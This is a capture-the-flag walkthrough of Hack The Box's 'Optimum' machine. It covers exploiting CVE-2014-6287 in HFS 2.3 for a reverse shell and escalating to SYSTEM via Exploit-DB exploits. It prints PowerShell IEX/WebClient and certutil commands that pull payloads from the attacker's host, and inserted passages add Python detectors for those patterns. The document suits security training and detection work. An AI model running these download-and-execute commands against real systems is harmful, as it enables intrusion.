About Optimum
In this post, I’m writing a write-up for the machine Optimum from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.
Optimum is an ‘Easy’ rated box, and it is retired. Grabbing and submitting the user.txt flag raises your points by 15, and submitting the root flag raises them by 30.
Foothold
We see an interesting port: HTTP (80), running an httpd. The http-server-header reports HFS 2.3, and the service version is HttpFileServer httpd 2.3. This version is vulnerable to CVE-2014-6287.
User
After exploiting this vulnerability I was able to establish a reverse shell as the user kostas.
Root
The root part of this machine was very interesting: we use searchsploit to look for a local privesc technique on Windows. Usually I would use linpeas, but in a box this simple I didn’t see it as necessary. I ran systeminfo on the box to find out the version and name of the OS, and I found a privesc technique on Exploit-DB that suits this OS (39719.ps1). After getting it onto the target machine using PowerShell, into a directory kostas can execute from, I was able to use this to get root.
Machine Info
Recon
nmap -sC -sV -oA ./nmap/10.10.10.8 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-03 14:24 UTC
Nmap scan report for 10.10.10.8
Host is up (0.12s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.59 seconds
As we can see, it is an HTTP web page; let’s pay it a visit.
Enumeration
I visited the web page http://10.10.10.8:80 and found a search bar that looks like it might be vulnerable to SQL injection or XSS.
Due to the emphasis on the HttpFileServer 2.3 portion of the scan, I am pretty certain that this is trying to tell us something: that something is wrong. With a little bit of research on exploits for this, I came up with the following.
Intrusion
After cloning a GitHub repo containing an exploit for CVE-2014-6287, we modify the Python script to suit our IP address and port.
CVE-2014-6287
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 (null byte) sequence in a search action.
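From the defender’s side, an added example that is not from the original write-up: a small Python scanner over constructed web-server access-log lines that flags requests whose search parameter percent-decodes to a NUL byte, the condition the CVE text above describes. The combined-style log format and the client address are assumptions.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed access-log lines in a combined-log style; they are invented for
# this example and are not taken from the original write-up or from HFS.
SAMPLE_LOG = """\
10.10.14.19 - - [03/Jul/2020:14:30:01 +0000] "GET / HTTP/1.1" 200 1520
10.10.14.19 - - [03/Jul/2020:14:30:05 +0000] "GET /?search=report HTTP/1.1" 200 830
10.10.14.19 - - [03/Jul/2020:14:30:09 +0000] "GET /?search=%00abc HTTP/1.1" 200 42
10.10.14.19 - - [03/Jul/2020:14:30:12 +0000] "GET /?search=%2500abc HTTP/1.1" 200 830
10.10.14.19 - - [03/Jul/2020:14:30:15 +0000] "GET /files/%00.txt HTTP/1.1" 404 210
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

def search_param_has_nul(target: str) -> bool:
    """True if the request target carries a 'search' query parameter whose
    percent-decoded value contains a NUL byte, the condition CVE-2014-6287
    abuses in HFS 2.3x before 2.3c. Only one decoding round is applied, so a
    double-encoded %2500 is not flagged; decode twice if your proxy does."""
    if "?" not in target:
        return False
    query = target.split("?", 1)[1]
    for pair in query.split("&"):
        key, _, raw_value = pair.partition("=")
        if key.lower() == "search" and "\x00" in unquote(raw_value):
            return True
    return False

def scan_hfs_log(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, client_ip, target) for every request whose search
    parameter contains a NUL. Lines that do not parse are skipped."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if m and search_param_has_nul(m.group("target")):
            hits.append((lineno, m.group("ip"), m.group("target")))
    return hits

if __name__ == "__main__":
    for lineno, ip, target in scan_hfs_log(SAMPLE_LOG):
        print(f"line {lineno}: {ip} requested {target!r}")
```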
Part of the CVE README/instructions includes serving nc.exe on port 80 before setting up a listener. Let’s do that: locate nc.exe, cp it to our directory, and serve it.
Now all that’s left to do is run the script.
Voila! We have a reverse shell.
Privilege Escalation
When we try to cd into admin, it gives us access denied.
As we can see, we cannot cd into Administrator; we need to privesc.
Let’s run the systeminfo command to see what we are working with.
So after looking up a local privesc exploit on Exploit-DB, I found a local Windows
Enum
We can use this if we can get it onto the Windows machine. After searching in Program Files, we find out that the machine has PowerShell and that we can run the ps1 file for a privesc exploit.
So how do we do this? Think of wget in Linux. To do the same from PowerShell, we need to serve the ps1 file from a simple HTTP server on our machine. Then we can use PowerShell to fetch it from our IP into a directory on the box with full rwx privileges.
(10.10.14.19 is our IP)
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:8080/39719.ps1', 'c:\Users\Public\Downloads\39719.exe')"
OR
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19:8080/39719.ps1')
Either of these PowerShell commands will grab our ps1 file as long as it is being hosted on our web server.
Now run the executable. The executable doesn’t work, so we need to do a bit more work. Let’s look for more exploits using windows-exploit-suggester.py.
The github repo:
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
Going through the README, we must run
pip install xlrd --upgrade
./windows-exploit-suggester.py --update
Now we must copy the output of systeminfo and paste it into a file on our local machine so the exploit suggester can use it; linpeas also does this.
Further Enum
We get some vulnerabilities, but this one looks interesting considering we are on a Windows 8.x system.
https://www.exploit-db.com/exploits/41020 is one that comes up; at the top of that page we can just download the exe rather than compiling it with gcc.
Now let’s serve this on a simple HTTP server and get it using:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:8080/41020.exe', 'c:\Users\Public\41020.exe')"
You could also use certutil to do this: certutil -urlcache -f http://ip/41020.exe (assuming we are serving on port 80).
Let’s serve it with the Python HTTP server so our exe can be reached.
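For detecting the download commands shown above (the two WebClient cradles and the certutil -urlcache variant), here is an added Python example that is not part of the original write-up: it classifies constructed process-creation command lines against a few rules and extracts the remote URL a responder would pivot on. The event records and rule names are constructed assumptions.

```python
import re
from typing import List, Tuple

# Constructed process-creation records (image name, command line). They are
# invented for this example and mirror the download commands in the write-up.
SAMPLE_EVENTS = [
    ("powershell.exe",
     "powershell -c \"(new-object System.Net.WebClient).DownloadFile("
     "'http://10.10.14.19:8080/39719.ps1', 'c:\\Users\\Public\\Downloads\\39719.exe')\""),
    ("powershell.exe",
     "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19:8080/39719.ps1')"),
    ("certutil.exe", "certutil -urlcache -f http://10.10.14.19/41020.exe"),
    ("certutil.exe", "certutil -verify -urlfetch cert.cer"),   # benign admin use
    ("powershell.exe", "powershell -c Get-ChildItem C:\\Users\\Public"),
]

# Each rule is (name, pattern over the command line). Matching is case-insensitive
# because PowerShell and certutil accept any casing.
RULES = [
    ("ps_webclient_download",
     re.compile(r"net\.webclient.*?\.download(file|string)\s*\(", re.I)),
    ("ps_iex_cradle", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("certutil_urlcache", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*-f\s+https?://", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\")]+")

def classify(cmdline: str) -> List[str]:
    """Return the names of the rules a command line triggers. IEX on its own is
    noisy, so it is reported only alongside a WebClient download cradle."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    if "ps_iex_cradle" in hits and "ps_webclient_download" not in hits:
        hits.remove("ps_iex_cradle")
    return hits

def scan_events(events: List[Tuple[str, str]]) -> List[Tuple[str, List[str], List[str]]]:
    """Return (image, matched_rules, remote_urls) for each flagged event; the URL
    list is what a responder would pivot on to find the hosting server."""
    findings = []
    for image, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append((image, hits, URL_RE.findall(cmdline)))
    return findings

if __name__ == "__main__":
    for image, rules, urls in scan_events(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)} -> {urls}")
```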
Own The Machine
Many thanks again for reading!